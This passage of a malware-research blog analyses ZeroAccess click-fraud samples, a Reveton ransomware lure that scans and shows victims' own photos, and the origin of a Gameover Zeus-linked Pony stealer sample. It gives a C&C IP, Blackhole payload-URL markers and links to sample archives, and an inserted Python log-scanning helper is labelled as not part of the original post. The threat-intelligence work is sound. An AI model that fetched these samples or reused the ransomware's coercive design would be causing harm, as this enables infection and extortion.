    - Statistics for the date, better to look at the next day .

    - US traffic = good profit .
    ------------------------------------------


    Files :
    42 Items in a zip (Owncloud via goo.gl)
    For those who would like to study this specific variation of Zaccess (MagicTraffic), here is a small Zip
(note :  the ZGO one may have been repacked by the team spreading it)

    Content of The Zip
    Read More :
    Reversal of fortune: Sirefef’s registry illusion - 2013-09-19 - Malware Protection Center - Microsoft
    The Wonder of Sirefef Plunder - 2013-05-20 - Malware Protection Center - Microsoft
    ZeroAccess: code injection chronicles - 2012-06-25 - Aleksandr Matrosov - Eset
    The ZeroAccess Rootkit - James Wyke - 2012 -  NakedSecurity - Sophos

    Reveton planting "evidences" on "the crime scene"



Quick post on the latest Reveton move. Thanks @MalwareSigs & @Ash4er for inputs :)

Reading Lavasoft Security Bulletin: November 2013 I saw a Ransomware design that was new to me. Lavasoft was associating it with : 908478d1f1faa539f228bbe4fcf23b6d which appears to be Reveton.

I decided to gather that design and ended up with a slightly different one :

    Reveton - US/Fall Back Design - 2013-12-03
    Blurred are Porn Images.
    Going on "Unlock Instructions" you'll get :

    Reveton - US/Fall Back Design - 2013-12-03
    Note the NSA involvement and the Prism Logo :)

    Prism Logo in a Reveton Design
    2013-12-03



    That variant is a little dynamic. It starts with the upper "camera square" and the "Evidences" zone empty. But a scan is in progress, and images are rotating. You'll see images that you really own being scanned.

    Scan in Progress

As soon as the first pornographic image is supposedly found, the square is filled with the handcuffs :)
(going to "Unlock Instructions" and back to "Offender Information" you'll get the camera)

    Portable Notepad++ splash screen (was stored in MyDocuments)
    after 2 porn images being found.

At the end of the scan you are shown why you should feel guilty (5 images).
And...guess what...those images are indeed on your computer :

    %programdata%

    Pictures Folder


    But...there is no clever trick to really spot Pornographic images. 

    Reveton dll planting "Evidences" on the "Crime Scene"
The "evidence planting" does not add to the scam for sure (the victim does not know about it) but the concept made me smile...
The new trick and most convincing part is your own images being shown during the scan process.
Photos of children...porn image...photos of Grandma...other porn image... may increase the conversion rate (% of victims falling for the scam)

Note that you can still land on those other Default/US designs. I am wondering if they are running some kind of study on how good the designs are.

    Other Reveton Design for US/Default
    2013-12-04
For other countries I didn't spot any move. Still the Stitur/Urausy design (with the camera and handcuff image on the left (Urausy : on the right))

    ----
    Reveton C&C ?

    Reveton Calling Home 2013-12-04
    199.115.114.209
    30633 | 199.115.112.0/21 | LEASEWEB-US | US | LEASEWEB.COM | LEASEWEB USA INC.
    ----

    Files:  2 samples here


    One ...random...Gameover Zeus Team Pony sample Story

    Pony Icon above fragment of
Khaled Desouki Photo tied to Tahrir Square events
Post to share some intel on the "Moar Pony" sample pointed to by SpiderLabs in the "Moar Pony" FAQ.

    <edit 2013-12-09>
It has been mentioned to me (and proven offline - thanks Franc !) that the sample Spiderlabs is pointing to is not related to that Pony DB. It's a coincidence that it matches the scale.
--
I have fixed this post accordingly
    </edit>

    AFAIK such a Huge Pony could be owned by only two teams.
    The /Home/ Gang (Darkleech/Nymaim) or the ZGO Team (Gameover Zeus aka Zeus P2P)

    (if you want to know more about those name please refer to : Paunch's arrest...The end of an Era !   )

    I decided to write after reading :

    FAQ: Pony Malware Payload Discovery  published yesterday by SpiderLabs team.

    Reply to the Hash of the Pony
    Looking at names under which that sample was submitted


    I figured out that I was the one who submitted it on 2013-06-06.
So I did some searching and can tell you where this specific sample comes from.

It belongs to the Gameover Zeus team. The one that was operating the Blackhole /Topic/ when Paunch got arrested. In June the thread folder was /news/  (this can be confusing because the same thread folder has been used later by another group that Conrad from the Dynamoo Blog refers to as  ru:8080 )

    Here is what I wrote in the "End of an Era post" :

    "This is the blackhole with the highest number of threads. Not sure it can be operated by only one guy. Or he must be really well organised !

    Distribution : Many compromised website (OT: they are also working a lot by mail attachments)
    Threats : More than 60 threads. More than 2000 rotating samples a day.
     The main activity is pushing Pony (different for many threads) as a loader for ZeusGameOver.
    But we could see also : Medfos, MagicTraffic (PPI ClickFraud tied to Zaccess), some fakeav, even Kovter Ransomware."

That specific instance of Pony was pushed in one of those threads. The one associated with the Blackhole file : abff4e31ce

You may find it in your logs (May/June at least) by looking for  :
2v:2w:33:33:1j:32:1i:1g:30:32
which was the pattern for that specific file in June, until Blackhole went v2.1. Then that pattern became:
    61626666346533316365
    then
    525357572h562g2e5456
    and then
    898a8e8ew98dw8w68b8d
    etc....

This is the 2nd parameter value of the payload URL...meaning if you see it...the payload has been downloaded.


    Illustration of 2nd Parameter value of the Payload url
    For another file :
    f6bd835642
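A small log-scanning helper for the markers listed above, as an added example that is not part of the original post: it pulls the second query parameter out of each request URL, matches it against the marker values quoted in the post, and shows that the v2.1 marker is simply the ASCII hex of the Blackhole file id abff4e31ce. The log lines, hostnames and query-parameter names are constructed for the example.

```python
"""Scan proxy-log lines for the Blackhole payload-URL markers quoted in the post.

Added example, not code from the original post. The marker strings are taken
from the post; the log lines, hosts and parameter names below are constructed.
"""
import re
from binascii import unhexlify
from urllib.parse import parse_qsl, urlsplit

# Second-parameter values the post lists for the Blackhole file abff4e31ce.
KNOWN_MARKERS = {
    "2v:2w:33:33:1j:32:1i:1g:30:32": "Blackhole v2 colon-encoded marker",
    "61626666346533316365": "Blackhole v2.1 hex-encoded marker",
    "525357572h562g2e5456": "later encoding of the same file id",
    "898a8e8ew98dw8w68b8d": "later encoding of the same file id",
}


def second_param_value(url):
    """Return the value of the second query parameter of url, or None."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return params[1][1] if len(params) >= 2 else None


def decode_hex_marker(value):
    """The v2.1 marker is the hex of the 10-character file id; recover that id
    when value is exactly 20 hex digits, otherwise return None."""
    if re.fullmatch(r"[0-9a-f]{20}", value) is None:
        return None
    try:
        return unhexlify(value).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_log(lines):
    """Return (line_no, label, decoded_file_id) for every line whose request
    URL carries a known marker as its second query parameter."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = re.search(r"https?://\S+", line)
        if match is None:
            continue
        value = second_param_value(match.group(0))
        if value in KNOWN_MARKERS:
            hits.append((line_no, KNOWN_MARKERS[value], decode_hex_marker(value)))
    return hits


# Constructed sample log lines (not real captures). Line 4 carries the marker
# as its only parameter, so it is deliberately not reported.
SAMPLE_LOG = [
    "2013-06-06 10:01:02 GET http://landing.invalid/news/?q=k1&rx=2v:2w:33:33:1j:32:1i:1g:30:32 200",
    "2013-06-06 10:01:09 GET http://cdn.invalid/static/logo.png 200",
    "2013-07-15 08:22:41 GET http://landing.invalid/news/?u=7f&h=61626666346533316365 200",
    "2013-07-15 08:23:00 GET http://landing.invalid/news/?h=61626666346533316365 200",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```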


Note : This was a way to follow a specific threat. I love graphs and would be happy to show you a Fiddler of an infection by this Pony...the problem is that I don't have one...because...wget is a far easier way to grab payloads than a high-interaction honey client. Yes wget <3 Blackhole :)

    I have at least  480 items of that same rotating instance of Pony.
    Here is the MD5 list : http://pastebin.com/raw.php?i=VTKCDDSE
    Here are the samples

    Disclaimer !!
I know that many other "instances" of Pony from this group were talking to that same CnC infra: from other threads of the same Blackhole, from fake Chrome/Flash updates, from mail attachments. You have already read about their activity multiple times. I just filtered the ones that were from the exact same rotation...


    To give you an idea, from the Blackhole of that team I grabbed from April to September around : 245 000 samples.
Now you may understand if I confess that I feel almost sad looking at the picture of Paunch published by CertGIB ;)


    -- Side note :
They were not using the leaked version of Pony. The coder of that loader/stealer may even be a member of that team (or at least was really tied to it)

    Read More :
    Two million stolen passwords: How to protect yourself - 2013-12-06 - Spiderlabs
    FAQ: Pony Malware Payload Discovery - 2013-12-06 - Spiderlabs
    Look What I Found: Moar Pony! 2013-12-03 - Daniel Chechik and Anat (Fox) Davidi - SpiderLabs
    Paunch's arrest...The end of an Era ! 2013-10-11
    Case of Pony downloading ZeuS via Passworded Zip Attachment of Malvertisement Campaign 2013-06-04 Hendrik Adrian - MalwareMustDie
    ZeuS-P2P monitoring and analysis - PDF - 2013-06 - CertPL
    Fake Adobe Flash Updates Resurface on the Web - 2013-01-24 - Jovi Umawing - ThreatTrack
    The Lifecycle of Peer-to-Peer (Gameover) ZeuS - 2012-07-23 -  Brett Stone-Gross, Dell SecureWorks